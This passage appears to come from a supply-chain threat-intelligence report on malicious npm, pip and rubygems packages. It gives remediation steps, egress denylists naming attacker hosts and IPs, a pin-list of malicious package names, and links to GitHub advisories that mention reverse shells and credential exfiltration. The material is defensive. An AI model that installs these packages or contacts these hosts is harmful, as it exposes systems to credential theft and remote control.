oast.fun,pipedream.net,ngrok-free.dev, and direct-IP outbound HTTP from CI to5.189.173.113at network egress.com.apple.unityplugin.storekitshould be pinned to your internal registry with.npmrcif your org has any Unity/Apple StoreKit integration - the name is a plausible internal-name lure - 10For Cluster I (
hachutisundeclared-binary tunnel): uninstall on hit. Any host that ran the CLI - directly or via a package that transitively invoked the binary - has an established Cloudflare Tunnel channel to the operator. Block*.trycloudflare.comat CI egress by default and allowlist only the tunnels your org actually uses. Grepnode_modules/*/bin/for undeclared binaries (not declared inpackage.jsonbinfield) as a general hygiene sweep - this pattern is showing up more often across the corpus - 11For Cluster J (
wurl_show_datarubygems): uninstall on hit. Payload is undisclosed so treat as install-time compromise; rotate credentials accessible from any host that ranbundle installon a Gemfile that pinned the version - 12For every
npm installin CI, prefer--ignore-scriptsand enforce it at the runner level (note it does NOT block Clusters C or D - both fire atrequire/module-load, not on install script). Layer with egress denylists onoob.algamil7x.xyz,raw.githubusercontent.com/skyzopedia/*,npmjs.it.com,jsonspack.com,reverse-shell.sh,ai-script.test0ing7.workers.dev,dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun,eoy34oyrep9j5x8.m.pipedream.net,estimator-nemeses-unwatched.ngrok-free.dev,already-query-bacteria-agreed.trycloudflare.com,5.189.173.113,10.0.73.186, and10.0.5.109. Extend the pin-lists from prior sweeps with@baanx/common,@baanx/domain,@insiderintelligence/componentlibrary,@rixxcodex/baileys,@rixxcodex/libsignal,sea-baileys,@otaxayun/libsignal-node,pino-testkit,vite-dev-launcher,@memtensor/memos-cloud-openclaw-plugin,internallib_v657,internallib_v463,godzz,godzzz,com.apple.unityplugin.storekit,simplenewnpmpackage,a-onesite,event-hunter,helpersutils-dev-tools,hachutis, and pipmemoryos, rubygemswurl_show_data
References
- GitHubGitHub Advisory Database - recent malware advisoriesgithub.com
- GitHubGHSA-27jh-hjhg-vg2p - @baanx/common (Cluster A - algamil7x day 7)github.com
- GitHubGHSA-qhfc-6rp6-pwv6 - @baanx/domain (Cluster A - algamil7x day 7)github.com
- GitHubGHSA-rjh6-qm48-cg84 - @insiderintelligence/componentlibrary (Cluster A - algamil7x day 7)github.com
- GitHubGHSA-fjxf-mv8f-cp6x - @rixxcodex/baileys (Cluster B - undocumented WhatsApp channels + unpinned @rixxcodex/libsignal HEAD)github.com
- GitHubGHSA-9xjg-g5r3-xpj8 - sea-baileys (Cluster B - libsignal remap to @otaxayun/libsignal-node@latest + newsletter JID injection)github.com
- GitHubGHSA-q57p-68r4-fj72 - pino-testkit (Cluster C - chai/pino/jsonspack family Function-constructor RCE)github.com
- GitHubGHSA-pg2r-jxrr-mx5j - vite-dev-launcher (Cluster D - mall4cloud-react RAT sibling, ~/.gradle/caches/ persistence)github.com
- GitHubGHSA-hxf9-rvj5-h45h - memoryos pip (Cluster E - maintainer-account compromise infostealer)github.com
- GitHubGHSA-mhjf-v53x-7p87 - @memtensor/memos-cloud-openclaw-plugin (Cluster E - openclaw plugin)github.com
- GitHubGHSA-w2wx-86qr-g533 - internallib_v657 (Cluster F - 10.0.73.186:443 curl-pipe reverse shell, new subnet)github.com
- GitHubGHSA-gv94-v8fj-f45c - internallib_v463 (Cluster F - reverse-shell.sh/10.0.73.186:443, "Primeiro PWN")github.com
- GitHubGHSA-p6cq-66pp-9r5g - godzz (Cluster G - Cloudflare Worker + Groq API key exfil + Chromium CDP scrape)github.com
- GitHubGHSA-6j9r-v67w-r8w4 - godzzz (Cluster G - cdp_inject.js credential exfil sibling)github.com
- GitHubGHSA-6r46-f382-x53p - com.apple.unityplugin.storekit (Cluster H - Apple/Unity impersonation, oast.fun beacon)github.com
- GitHubGHSA-mr2p-c47m-85w8 - simplenewnpmpackage (Cluster H - same oast.fun subdomain as com.apple.unityplugin.storekit)github.com
- GitHubGHSA-9j7m-m3w9-mgrc - a-onesite (Cluster H - Pipedream unencrypted-HTTP wget beacon)github.com
- GitHubGHSA-wwrq-gcqx-rx6p - event-hunter (Cluster H - "DepConfusion to RCE POC" ngrok beacon)github.com
- GitHubGHSA-w43w-f8m4-5r39 - helpersutils-dev-tools (Cluster H - 5.189.173.113:8899 direct-IP HTTP beacon)github.com
- GitHubGHSA-9rj9-xh7c-qqh8 - hachutis (Cluster I - undeclared bin/cli binaries + trycloudflare tunnel)github.com
- GitHubGHSA-345f-5r88-8j64 - wurl_show_data rubygems (Cluster J - OSSF-flagged malware, no analysis)github.com
- jaschadubjaschadub/compromised-packages-checkgithub.com
- OpenSSFOpenSSF malicious-packages repositorygithub.com